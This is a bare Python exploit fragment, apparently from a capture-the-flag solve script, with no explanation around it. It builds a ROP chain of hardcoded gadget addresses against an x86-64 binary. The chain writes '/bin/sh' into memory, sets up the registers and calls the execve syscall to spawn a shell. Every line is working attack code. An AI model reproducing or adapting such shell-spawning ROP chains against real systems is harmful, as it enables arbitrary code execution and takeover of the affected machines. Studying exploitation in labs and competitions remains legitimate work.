payload = p64(0x4117e7)
#0x00000000004117e7: pop rsi; ret; 
payload += p64(0x438068)+p64(0x42f731)
# 0x000000000042f731: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4198df)
# 0x00000000004198df: mov qword ptr [rsi + 8], rax; ret; 
payload += p64(0x40ee0e)
# 0x000000000040ee0e: pop r12; ret; 
payload += p64(0x0)+p64(0x42f731)
# 0x000000000042f731: pop rax; ret; 
payload += p64(0x411d8e)+p64(0x420406)
# 0x0000000000420406: mov rdx, r12; mov esi, ebp; call rax; 
payload += b''
# 0x0000000000411d8e: pop rdi; pop rbp; ret; 
payload += p64(0x0)+p64(0x42f731)
# 0x000000000042f731: pop rax; ret; 
payload += p64(0x3b)+p64(0x411d8e)
# 0x0000000000411d8e: pop rdi; pop rbp; ret; 
payload += p64(0x438070)+p64(0x0)+p64(0x4117e7)
# 0x00000000004117e7: pop rsi; ret; 
payload += p64(0x0)+p64(0x43282f)
# 0x000000000043282f: syscall; 
payload += b''
